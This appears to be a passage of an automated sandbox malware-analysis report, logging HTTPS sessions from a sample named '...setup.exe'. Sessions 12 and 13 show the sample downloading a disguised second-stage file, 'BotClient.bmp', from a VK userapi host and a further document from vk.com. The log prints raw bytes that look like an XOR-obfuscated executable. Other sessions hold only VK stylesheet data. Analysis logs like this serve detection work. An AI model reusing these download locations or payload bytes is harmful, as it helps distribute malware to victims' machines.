2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 69 6e 65 63 61 70 25 33 44 25 32 32 72 6f 75 6e 64 25 32 32 25 33 45 25 33 43 70 61 74 68 25 32 30 64 25 33 44 25 32 32 4d 34 31 30 2e 33 25 32 30 31 37 2e 32 6c 2d 31 2e 31 25 32 30 31 36 25 32 32 25 32 46 25 33 45 25 33 43 70 61 74 68 25 32 30 64 25 33 44 25 32 32 4d 34 31 33 2e 32 25 32 30 31 36 2e 36 6c 2d 31 30 2e 34 25 32 30 31 34 2e 38 25 32 32 25 32 30 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 25 33 44 25 32 32 31 2e 34 32 36 30 33 35 38 39 38 32 31 35 33 37 39 31 25 32 43 31 36 2e 35 37 33 39 36 34 31 30 31 30 37 34 30 36 25 32 32 25 32 30 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 25 33 44 25 32 32 39 2e 37 25 32 32 25 32 46 25 33 45 25 33 43 70 61 74 68 25 32 30 64 25 33 44 25 32 32 4d 34 31 33 2e 36 25 32 30 31 39 2e 35 4c 33 39 Data Ascii: inecap%3D%22round%22%3E%3Cpath%20d%3D%22M410.3%2017.2l-1.1%2016%22%2F%3E%3Cpath%20d%3D%22M413.2%2016.6l-10.4%2014.8%22%20stroke-dasharray%3D%221.4260358982153791%2C16.57396410107406%22%20stroke-dashoffset%3D%229.7%22%2F%3E%3Cpath%20d%3D%22M413.6%2019.5L39
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 5f 73 65 70 61 72 61 74 6f 72 5f 70 72 69 6d 61 72 79 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 30 70 78 7d 0a 2e 66 6f 6f 74 65 72 5f 77 72 61 70 3a 65 6d 70 74 79 7b 70 61 64 64 69 6e 67 3a 76 61 72 28 2d 2d 70 61 67 65 2d 62 6c 6f 63 6b 2d 6f 66 66 73 65 74 2c 20 31 35 70 78 29 30 20 30 7d 0a 2e 66 6f 6f 74 65 72 5f 77 72 61 70 2e 73 69 6d 70 6c 65 7b 6d 61 72 67 69 6e 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 0a 2e 66 6f 6f 74 65 72 5f 77 72 61 70 2e 73 69 6d 70 6c 65 20 2e 66 6f 6f 74 65 72 5f 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 0a 2e 66 6f 6f 74 65 72 5f 6e 61 76 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 74 65 78 74 5f 73 75 62 68 65 61 64 29 3b 64 69 73 70 6c 61 Data Ascii: _separator_primary);margin-top:40px}.footer_wrap:empty{padding:var(--page-block-offset, 15px)0 0}.footer_wrap.simple{margin:0;width:auto;clear:both}.footer_wrap.simple .footer_links{display:none}.footer_nav{color:var(--vkui--color_text_subhead);displa
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 61 36 36 3a 72 67 62 61 28 30 2c 20 33 36 2c 20 37 37 2c 20 30 2e 36 36 29 3b 2d 2d 62 6c 61 63 6b 5f 62 6c 75 65 34 35 5f 61 6c 70 68 61 31 30 3a 72 67 62 61 28 30 2c 20 35 37 2c 20 31 31 35 2c 20 30 2e 31 30 29 3b 2d 2d 62 6c 75 65 5f 34 30 30 3a 23 35 31 38 31 62 38 3b 2d 2d 62 6c 75 65 5f 61 34 30 30 3a 23 34 34 37 62 62 61 3b 2d 2d 62 6c 75 65 5f 34 30 30 5f 61 6c 70 68 61 32 30 3a 72 67 62 61 28 38 31 2c 20 31 32 39 2c 20 31 38 34 2c 20 30 2e 32 30 29 3b 2d 2d 62 6c 75 65 5f 34 30 30 5f 61 6c 70 68 61 34 38 3a 72 67 62 61 28 38 31 2c 20 31 32 39 2c 20 31 38 34 2c 20 30 2e 34 39 29 3b 2d 2d 62 6c 75 65 5f 34 32 30 3a 23 34 61 37 36 61 38 3b 2d 2d 62 6c 75 65 5f 35 35 30 3a 23 33 34 36 32 39 37 3b 2d 2d 62 6c 75 65 5f 36 30 30 3a 23 32 61 35 38 38 35 Data Ascii: a66:rgba(0, 36, 77, 0.66);--black_blue45_alpha10:rgba(0, 57, 115, 0.10);--blue_400:#5181b8;--blue_a400:#447bba;--blue_400_alpha20:rgba(81, 129, 184, 0.20);--blue_400_alpha48:rgba(81, 129, 184, 0.49);--blue_420:#4a76a8;--blue_550:#346297;--blue_600:#2a5885
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 67 65 2d 2d 72 65 67 75 6c 61 72 3a 38 38 30 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 66 69 65 6c 64 5f 68 6f 72 69 7a 6f 6e 74 61 6c 5f 70 61 64 64 69 6e 67 2d 2d 72 65 67 75 6c 61 72 3a 31 32 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 62 75 74 74 6f 6e 5f 70 61 64 64 69 6e 67 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2d 2d 72 65 67 75 6c 61 72 3a 31 32 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 61 72 72 6f 77 5f 70 61 64 64 69 6e 67 2d 2d 72 65 67 75 6c 61 72 3a 31 32 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 74 6f 6f 6c 74 69 70 5f 6d 61 72 67 69 6e 2d 2d 72 65 67 75 6c 61 72 3a 38 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 69 63 6f 6e 5f 75 5f 69 2d 2d 72 65 67 75 6c 61 72 3a 31 36 70 78 3b 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 61 Data Ascii: ge--regular:880px;--vkui--size_field_horizontal_padding--regular:12px;--vkui--size_button_padding_horizontal--regular:12px;--vkui--size_arrow_padding--regular:12px;--vkui--size_tooltip_margin--regular:8px;--vkui--size_icon_u_i--regular:16px;--vkui--size_a
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 70 75 72 70 6c 65 2d 2d 61 63 74 69 76 65 3a 23 36 61 35 36 64 38 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 76 69 6f 6c 65 74 3a 23 37 39 32 65 63 30 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 76 69 6f 6c 65 74 2d 2d 68 6f 76 65 72 3a 23 37 34 32 64 62 62 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 76 69 6f 6c 65 74 2d 2d 61 63 74 69 76 65 3a 23 36 66 32 63 62 36 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 72 61 73 70 62 65 72 72 79 5f 70 69 6e 6b 3a 23 65 30 33 66 61 62 3b 2d 2d 76 6b 75 69 2d 2d 63 6f 6c 6f 72 5f 61 63 63 65 6e 74 5f 72 61 73 70 62 65 72 72 79 5f 70 69 6e 6b 2d 2d 68 6f 76 65 72 3a 23 64 37 33 Data Ascii: kui--color_accent_purple--active:#6a56d8;--vkui--color_accent_violet:#792ec0;--vkui--color_accent_violet--hover:#742dbb;--vkui--color_accent_violet--active:#6f2cb6;--vkui--color_accent_raspberry_pink:#e03fab;--vkui--color_accent_raspberry_pink--hover:#d73
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 74 61 6b 74 65 5f 69 6d 5f 62 75 62 62 6c 65 5f 69 6e 63 6f 6d 69 6e 67 5f 61 6c 74 65 72 6e 61 74 65 5f 68 69 67 68 6c 69 67 68 74 65 64 2d 2d 61 63 74 69 76 65 3a 23 65 33 65 35 65 62 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 69 6d 5f 62 75 62 62 6c 65 5f 69 6e 63 6f 6d 69 6e 67 5f 65 78 70 69 72 69 6e 67 5f 68 69 67 68 6c 69 67 68 74 65 64 3a 23 63 63 64 33 66 66 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 69 6d 5f 62 75 62 62 6c 65 5f 69 6e 63 6f 6d 69 6e 67 5f 65 78 70 69 72 69 6e 67 5f 68 69 67 68 6c 69 67 68 74 65 64 2d 2d 68 6f 76 65 72 3a 23 63 34 63 62 66 37 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 69 6d 5f 62 75 62 62 6c 65 5f 69 6e 63 6f 6d 69 6e 67 5f 65 78 70 69 72 69 6e 67 5f 68 69 67 68 6c 69 67 Data Ascii: takte_im_bubble_incoming_alternate_highlighted--active:#e3e5eb;--vkui--vkontakte_im_bubble_incoming_expiring_highlighted:#ccd3ff;--vkui--vkontakte_im_bubble_incoming_expiring_highlighted--hover:#c4cbf7;--vkui--vkontakte_im_bubble_incoming_expiring_highlig
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 70 68 61 2d 2d 61 63 74 69 76 65 3a 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 32 34 29 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 69 6e 70 75 74 5f 62 6f 72 64 65 72 3a 23 35 35 35 35 35 35 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 69 6e 70 75 74 5f 62 6f 72 64 65 72 2d 2d 68 6f 76 65 72 3a 23 35 63 35 63 35 63 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 69 6e 70 75 74 5f 62 6f 72 64 65 72 2d 2d 61 63 74 69 76 65 3a 23 36 33 36 33 36 33 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 61 6b 74 65 5f 63 6f 6c 6f 72 5f 73 65 61 72 63 68 5f 62 61 72 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 32 32 32 32 32 3b 2d 2d 76 6b 75 69 2d 2d 76 6b 6f 6e 74 Data Ascii: pha--active:rgba(255, 255, 255, 0.24);--vkui--vkontakte_color_input_border:#555555;--vkui--vkontakte_color_input_border--hover:#5c5c5c;--vkui--vkontakte_color_input_border--active:#636363;--vkui--vkontakte_color_search_bar_background:#222222;--vkui--vkont
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 64 29 2c 2e 76 6b 75 69 49 6e 74 65 72 6e 61 6c 50 61 6e 65 6c 48 65 61 64 65 72 7e 2e 76 6b 75 69 46 69 78 65 64 4c 61 79 6f 75 74 2d 2d 76 65 72 74 69 63 61 6c 2d 74 6f 70 7b 74 6f 70 3a 35 36 70 78 3b 74 6f 70 3a 63 61 6c 63 28 76 61 72 28 2d 2d 76 6b 75 69 2d 2d 73 69 7a 65 5f 70 61 6e 65 6c 5f 68 65 61 64 65 72 5f 68 65 69 67 68 74 2d 2d 72 65 67 75 6c 61 72 29 20 2b 20 76 61 72 28 2d 2d 76 6b 75 69 5f 69 6e 74 65 72 6e 61 6c 2d 2d 73 61 66 65 5f 61 72 65 61 5f 69 6e 73 65 74 5f 74 6f 70 29 29 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 76 6b 75 69 72 6f 6f 74 2d 69 6f 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 73 68 6f 77 2d 62 61 63 6b 7b 30 25 7b 6f 70 61 63 69 74 79 3a 2e 33 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 7d 7d 0a 40 6b 65 79 66 72 61 6d 65 73 20 76 Data Ascii: d),.vkuiInternalPanelHeader~.vkuiFixedLayout--vertical-top{top:56px;top:calc(var(--vkui--size_panel_header_height--regular) + var(--vkui_internal--safe_area_inset_top))}@keyframes vkuiroot-ios-animation-show-back{0%{opacity:.3}to{opacity:0}}@keyframes v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49752	95.142.206.3	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:12 UTC	420	OUT	GET /c237031/u851967711/docs/d44/57796f4397b6/BotClient.bmp?extra=Uo921g-adSvvTWhdB6yDb5HdFI5_X3VJlRVmHM-Bh6mJlvI7hkGi94eW7KfU-ssLh3GfPV8Ees6kZM0RD1upQfkxRtTtcM3LgknqFomcBUvMb567aPkC4b-b3Csz0akrGpBI454GBQIw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: sun6-23.userapi.com Connection: Keep-Alive
2024-07-01 22:05:12 UTC	587	IN	HTTP/1.1 200 OK Server: kittenx Date: Mon, 01 Jul 2024 22:05:12 GMT Content-Type: image/x-ms-bmp Content-Length: 3828756 Connection: close Last-Modified: Fri, 28 Jun 2024 09:25:17 GMT ETag: "667e817d-3a6c14" Expires: Wed, 31 Jul 2024 22:05:12 GMT Cache-Control: max-age=2592000 X-Frontend: front6-23 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic X-Trace-Id: k8_KVT3WXnXrVH0_JxSZWk_UdAVJ5Q Accept-Ranges: bytes
2024-07-01 22:05:12 UTC	15797	IN	Data Raw: dd cc 66 55 58 4f 85 15 16 15 15 15 11 15 15 15 ea ea 15 15 ad 15 15 15 15 15 15 15 ff 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 15 0d 14 15 15 1b 80 af 1b 15 a1 1c d8 34 ad 14 59 d8 34 41 7d 7c 66 35 65 67 7a 72 67 74 78 35 76 74 7b 7b 7a 61 35 77 70 35 67 60 7b 35 7c 7b 35 51 5a 46 35 78 7a 71 70 3b 18 18 1f 31 15 15 15 15 15 15 15 b6 b6 87 33 f2 d7 e9 60 f2 d7 e9 60 f2 d7 e9 60 b9 af ea 61 f9 d7 e9 60 b9 af ec 61 30 d7 e9 60 30 56 14 60 f6 d7 e9 60 30 56 ed 61 e0 d7 e9 60 30 56 ea 61 e4 d7 e9 60 30 56 ec 61 a6 d7 e9 60 b9 af ed 61 e5 d7 e9 60 b9 af ef 61 f3 d7 e9 60 b9 af e8 61 f9 d7 e9 60 f2 d7 e8 60 68 d7 e9 60 0a ff e0 61 ea d7 e9 60 0a ff 16 60 f3 d7 e9 60 0a ff eb 61 f3 d7 e9 60 47 7c 76 Data Ascii: fUXO4Y4A}\|f5egzrgtx5vt{{za5wp5g`{5\|{5QZF5xzqp;13```a`a0`0V``0Va`0Va`0Va`a`a`a``h`a```a`G\|v
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 97 62 47 f1 78 a1 5b 65 48 9c c2 31 45 9a a0 09 23 3e 64 3f e6 97 36 21 4b 4f 6f 1d ba ce 0e b1 b3 f3 29 41 81 89 67 17 b6 e7 0c bf bb 50 79 c8 bf 5c 33 5b 27 ed cd 31 1b 6d 7a fd 0c e5 e7 08 22 4c 87 89 90 43 93 c9 cd 50 73 a7 9b 07 1e fe af 61 a5 79 aa 2c 10 a7 b3 0b 0f 1f 35 e7 15 39 05 af 38 32 9a 53 1f df 65 39 12 cc c1 7e 7d 98 51 84 f7 65 07 6a 9a 37 5f a9 de 61 50 0c f4 c1 11 3b 06 4b 7c 3d 6a 19 ec 99 81 81 90 83 a2 61 bd 3a 34 8b f7 50 2c a6 d4 bb 00 e9 ee ae 12 7e a2 25 a7 cf 82 ed ae 01 22 44 7b 50 b1 33 8f 70 0c bd e4 48 b8 e9 bb c4 ba 43 14 be b9 92 68 81 61 9c ba c0 d2 1f a9 21 f9 33 ce c2 0d e5 27 cd 02 65 a4 81 bc b4 0b 38 02 3c 9e 7e 7d 48 05 63 67 0d ab fa cd 77 15 e4 64 8b a6 cc dc 3f d6 4c 4b 52 78 3c 69 26 04 90 5b c0 4e 18 5a e2 f1 Data Ascii: bGx[eH1E#>d?6!KOo)AgPy\3['1mz"LCPsay,5982Se9~}Qej7_aP;K\|=ja:4P,~%"D{P3pHCha!3'e8<~}Hcgwd?LKRx<i&[NZ
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 5b b9 70 25 20 10 af 78 13 70 d6 8c 3e 25 81 8b 03 4c e4 4c 89 b9 73 a1 07 4c 2e 80 0d a4 dd a3 0c 5c f5 8d 26 89 10 94 17 bd be 55 c7 82 4c 5c e5 9f cf 41 ea bc 99 bb 79 4d 84 c9 6c 59 03 24 37 60 30 4d 64 a5 f3 67 59 a0 db fb ed 0e 0b 0b 71 be d4 fc 3e d7 8b fb ec 11 f0 b5 61 d2 17 5e c7 a1 6b 5f 2f 1e bb 31 55 d8 cc bd 63 9a 49 e4 a3 a9 4f 53 38 35 69 2b eb e6 d1 37 97 a4 36 ba 65 c8 26 3d ee 43 be 57 9c 81 3b 38 d5 31 9a 2d a2 6e 99 03 d8 42 5f ec 71 40 9d 85 91 b7 d1 38 69 cd ec 4a 35 73 6d 2d ce 80 a7 a2 fc 41 f7 ec 96 6b be 24 e6 9d 14 76 e6 d6 d2 2d 99 66 5a 1c 77 0c a9 7c a7 69 ea 9a a3 c2 06 14 21 e1 fb 03 dc 01 7b a8 d7 93 2a c8 4b 83 cd 1f 61 d6 b5 73 a5 d8 fd d7 48 c6 c2 e1 92 1c f9 bf 6d 8b d4 63 97 34 35 eb 16 de 74 0c a2 af 14 08 a3 9d 40 Data Ascii: [p% xp>%LLsL.\&UL\AyMlY$7`0MdgYq>a^k_/1UcIOS85i+76e&=CW;81-nB_q@8iJ5sm-Ak$v-fZw\|i!{*KasHmc45t@
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: c8 cd 9a c6 65 8c 71 d2 63 ac 1f 16 10 10 81 7c 7d 62 71 1f 7c 01 ac 5f de d0 75 a5 45 0f 4c 13 36 15 e6 c5 91 36 7b 54 f1 42 6a 47 7e a6 4b 8e 8c 8d 65 04 f7 c6 a4 75 e2 f3 c1 90 73 28 25 cb 08 21 05 fd 33 7b 77 b9 7f 1f 01 88 91 c6 bf 55 75 2f 4c 4a b4 c3 07 39 f3 cb 16 6d 9c 94 82 bf fd b3 be 02 3a 0c cc 11 5d 71 98 d2 3a 7c 5a 75 ea b7 a2 19 37 ce 90 09 05 10 cb 2c 65 95 6f 19 4d 76 a4 d6 a3 95 72 cc c8 6e 93 68 80 73 ca 9c 27 8d 6c c9 c1 dc 3b 81 89 95 68 16 0f 22 fe 3b 0b 7c 01 1c 29 2f 03 f5 91 2a 51 48 c9 d5 e0 a8 af 0f 3b dd a4 7e 86 50 49 28 4b b9 1b 2d 8d 4d ba cb ce b8 88 80 24 2a 61 63 96 cc fb 7a 85 4d bd ac 2b 98 15 cf bc 6e de 07 12 1f da 96 cc 65 fc 0a 48 97 a5 90 68 9e 87 44 dc 61 85 20 c5 9a 6a 85 b8 9a a4 2e 4b ac e5 b2 51 7d 88 97 71 Data Ascii: eqc\|}bq\|_uEL66{TBjG~Keus(%!3{wUu/LJ9m:]q:\|Zu7,eoMvrnhs'l;h";\|)/QH;~PI(K-M$aczM+neHhDa j.KQ}q
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 4b e2 fe 98 e4 43 a1 18 75 9a 70 8b de 83 8b f7 c9 43 ef f5 c9 b6 2c 36 f6 e4 2c 35 2d f0 dc 6f c8 54 b5 83 b7 19 ee be 0d 64 18 df 4b 10 7a e8 df 4d de 76 42 a5 8a fb 17 51 53 fa 1f f6 1b d2 40 32 16 a8 63 c9 23 a7 48 85 19 12 8e c4 17 2e 8e 5b a3 31 f4 e9 15 ba b4 6f ef f7 9f 02 1e 2e 8e 4b d0 f8 3a 40 93 02 39 ad f2 9e bc 43 a3 0d fa 3b 65 1e cc a4 9a c9 db 70 77 a2 35 1c a2 d2 39 84 1f b9 5f 66 0b 52 a1 12 83 20 56 5c dd c7 3d 80 1f 76 90 cb 9a d7 17 45 0c 2d 60 ae d8 b3 21 6e 85 9e e8 3c 20 17 f5 d5 8d 7b 58 89 fe 41 6d 3c e9 3d fa a2 80 01 d4 9e ac d1 da 17 fe 31 9e 95 fd 55 31 63 93 29 f4 86 7a 1c 20 66 fe 78 12 6f df 97 97 5a 02 ec d5 af 70 a1 ed f7 50 17 22 45 e9 f5 d9 3e 11 40 f9 b1 87 91 f4 f8 d3 d1 56 35 59 33 8c 19 cc 81 69 c4 0d 98 d6 71 64 Data Ascii: KCupC,6,5-oTdKzMvBQS@2c#H.[1o.K:@9C;epw59_fR V\=vE-`!n< {XAm<=1U1c)z fxoZpP"E>@V5Y3iqd
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: f6 8d ba 91 74 2b 5d 71 cf bd 7a 6f 7b 02 5b fb 16 63 9e aa a0 d6 18 9b 29 5a 87 1d 90 fb 4c 2e 33 e8 77 fc 67 4a 9a 20 51 00 16 b9 45 cc ef bf 5a 14 f6 6d a7 1b 16 03 45 76 ab 78 6f a2 82 4b f2 42 ba 66 f6 a4 b4 bf 47 aa 01 ce 9a ec c6 09 82 76 01 9f 2d 2f 7b e5 85 7a ab 2f 9f 85 0c dd f7 e9 64 2c ed 7b 3c 8d 2e 71 8e 2c 0f b5 67 40 f6 50 ec 2e 6f 9d 73 e1 b8 2c 14 58 bb 34 83 1e 62 d0 67 00 df 32 fc eb 5a 46 a9 29 03 df 19 ab 2f 59 a7 fb 61 fb e9 3c d2 f0 74 c1 5f b8 6e ab d8 c5 ae 09 e0 f2 1c 97 57 a7 b0 19 6d f2 37 14 d8 f7 d9 b8 1c 29 a1 c5 c9 fd b3 33 89 8a d1 ea bf fc 95 8b fb 6e 8d 72 a5 83 b8 53 5b 93 f2 bc a8 ea 1b a5 9c 42 18 30 51 93 2c b1 4c 08 80 b8 1f 1b ca 72 48 89 06 64 0d 1b 16 e2 89 31 fa 0b b2 ea fe 58 43 8c 99 e8 6f 36 8e c5 6f 33 51 Data Ascii: t+]qzo{[c)ZL.3wgJ QEZmEvxoKBfGv-/{z/d,{<.q,g@P.os,X4bg2ZF)/Ya<t_nWm7)3nrS[B0Q,LrHd1XCo6o3Q
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 91 25 a7 ba 5e 39 e4 e8 b2 95 cf a1 56 d1 cf e4 d7 9d fd cd 9d 15 a5 7b 1f 99 6f 32 44 90 04 19 ab be 89 39 4e 3e 42 a8 d6 9b 75 e9 47 ad 75 5f fb a0 65 cd ca a5 10 d6 e3 cc 57 2a fb 93 b7 a5 4e 2e 2d a6 2a 6a eb 24 8b 76 bf 0d a4 41 6d 47 0e f3 8c 6d 5a 94 d7 e0 4a fe d4 f0 32 c4 1c bf df bb 4a f6 2f 09 0f e5 ab cd 5a 61 46 5a 9f 4d 98 3e 02 d1 2e 4e 6b a6 66 56 34 41 0f 1d 2f a1 54 9a d0 51 d3 82 7a bb 52 21 84 22 93 dd 5f f0 d7 35 86 51 62 e3 f9 be 95 42 7a e3 d9 7f 1f 53 97 86 90 81 33 14 a2 78 c6 1e 36 20 26 da df cc 6b 4f ec e1 ac 95 b8 3d 79 07 e4 dd a3 ae b1 24 91 a0 71 05 77 f3 d1 e2 49 ba 87 79 bb 8e 55 5d db 2e 09 84 d4 66 f3 59 fb 3b ba bc a3 16 f7 60 77 8a f9 5f 9a cd 70 aa 32 66 98 f0 43 e5 a8 4f 67 91 1c a5 75 a1 c9 a4 b0 1c cb b1 d6 bc 69 Data Ascii: %^9V{o2D9N>BuGu_eWN.-j$vAmGmZJ2J/ZaFZM>.NkfV4A/TQzR!"_5QbBzS3x6 &kO=y$qwIyU].fY;`w_p2fCOgui
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: f2 1f dd 32 81 67 ac a0 5b 85 0f 2b 93 9d f4 9d d5 0a b9 a6 5d 32 e1 9f 94 13 8e 0a 1e cf a2 74 9f 04 5b 81 50 c3 18 50 d1 bf 9e 23 aa e0 a9 e0 da ee c3 cb b2 03 89 ea d7 84 ac ce f8 2b 05 e0 64 42 60 af bd 78 14 f2 02 55 7e 14 e2 51 c3 7d a7 e1 a0 4f d2 c7 17 41 c5 f0 f4 d6 e4 87 88 ee df 58 09 b8 95 8f 14 79 d6 d6 53 26 21 be d2 2f cd 1a 71 94 e0 56 08 6d 23 9c f9 b1 ea ec 4f 71 21 73 7f 53 c3 f0 02 f2 f7 b2 b9 20 a7 77 ba 65 d3 cd f4 35 79 01 19 7b 55 6e 73 56 d4 49 a8 9a 36 55 02 35 dc 9f 2f 66 90 03 a6 49 a1 63 1b da 1a 46 dd 99 8a 80 3a 2a b3 9d 99 b4 58 aa 8e 8b 91 12 ee d9 0c b0 72 da f3 f2 27 58 46 22 b6 3a d8 4e 95 3b 03 a4 82 a2 22 cd a7 4f 4b 19 f0 cd 61 4f be eb ff 89 8c 40 a5 4a 24 de 5f 3b f5 e7 26 5a c5 ba 8f cf 6d f1 f2 c0 67 e8 1e 9f 93 Data Ascii: 2g[+]2t[PP#+dB`xU~Q}OAXyS&!/qVm#Oq!sS we5y{UnsVI6U5/fIcF:*Xr'XF":N;"OKaO@J$_;&Zmg
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 61 ab 25 b9 2b d3 18 0f b9 3c a4 c8 91 c3 1c 5a 0c 13 02 ba 38 a8 02 a8 45 15 b3 11 d0 b3 70 ad f2 16 43 bf 18 25 d6 b9 ba a7 e9 bc 10 67 d8 95 75 ad d9 39 08 91 1c 0d d0 eb 93 04 09 00 a2 80 cd de 6e a2 31 0b 96 ed dc 1a 0c e2 cb 70 53 63 46 51 0a b9 d9 24 4c 11 b6 f5 a8 68 a8 6e 01 95 c8 d8 69 3b 62 c9 1a 51 88 9c 3d 26 2b cf e8 12 b0 9f 15 16 ff 91 a9 2b 3e 53 84 06 53 e9 90 79 27 51 0b 0d d0 e8 b5 2d 99 49 e1 4c ed cf 45 f2 97 fd 1e f4 df ab 89 a5 52 e9 67 23 8f b3 2f c8 df 05 b6 35 a7 96 53 b1 81 e2 89 c9 da db 85 82 bf 09 88 dd b5 06 01 31 5b dc df 2b 9b 90 d7 18 32 5e 65 bd ed 68 a3 74 61 6f 93 b0 11 60 d4 7c ab ac ee f7 24 41 ec c7 bc de 56 c0 7f 74 3a 80 30 b7 d1 79 90 6b 08 bd d9 9b 29 a2 43 d3 a8 9e 1b f8 8a df fb c0 21 da 77 1d 0d cf 83 2c 6d Data Ascii: a%+<Z8EpC%gu9n1pScFQ$Lhni;bQ=&++>SSy'Q-ILERg#/5S1[+2^ehtao`\|$AVt:0yk)C!w,m
2024-07-01 22:05:12 UTC	16384	IN	Data Raw: 82 19 72 d0 e0 5f b5 67 d3 53 8a 97 46 c3 ba 9a 2e e5 ee 12 1d 72 8a bb 3d 98 8f 24 8f a4 f5 d5 a0 1b 75 b1 80 0d fc b4 03 b8 db fe e1 17 bc 5f b6 e2 1b e7 91 71 ca 8f 28 df 71 a5 0b 39 b4 24 63 cc a3 bb 56 69 ad 99 47 f8 04 d7 d7 89 27 70 c8 e0 08 dc 44 89 5e 91 5c b1 fd a0 f8 16 a5 2e 6f 2a 9e 9e 0e ce a6 e9 1b 90 94 7f 33 46 d2 20 6b 07 bc 02 ad 12 95 c3 d8 73 0c e3 d2 9d ce 7b ae 1b 0a bb fd d4 a0 e8 ce 4a 79 7c 30 1c c2 52 dc 16 14 f1 26 a3 65 5e 94 01 06 bd 60 7e 05 5c 99 16 e3 78 8b ab 4c a1 b6 0f 7b ed b5 aa 9c 17 18 50 13 05 a2 16 f1 aa c1 68 75 e0 d2 5f ad ce b1 6b 36 f5 5a 0d ff cd a1 83 0d 7e 4e 2e f0 a0 cb 9b 66 ad b7 1e 05 6c 10 6a f3 1d 9b a2 08 99 b7 2b ce d0 a5 91 9e 88 63 f1 99 26 66 55 52 db 69 12 d9 a7 ab b6 46 da e9 6e ab 70 6d a6 8a Data Ascii: r_gSF.r=$u_q(q9$cViG'pD^\.o*3F ks{Jy\|0R&e^`~\xL{Phu_k6Z~N.flj+c&fURiFnpm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49753	87.240.132.78	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:12 UTC	321	OUT	GET /doc851967711_678965991?hash=15v5bIC0BdxsDWrpl71N2Lf9ztIhZN508DquMzIAGCz&dl=yDzL4lhSc6Qh08VS3lx8KlKwYrkSiYGlwvhnSbB1cMD&api=1&no_preview=1#1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: vk.com Cache-Control: no-cache
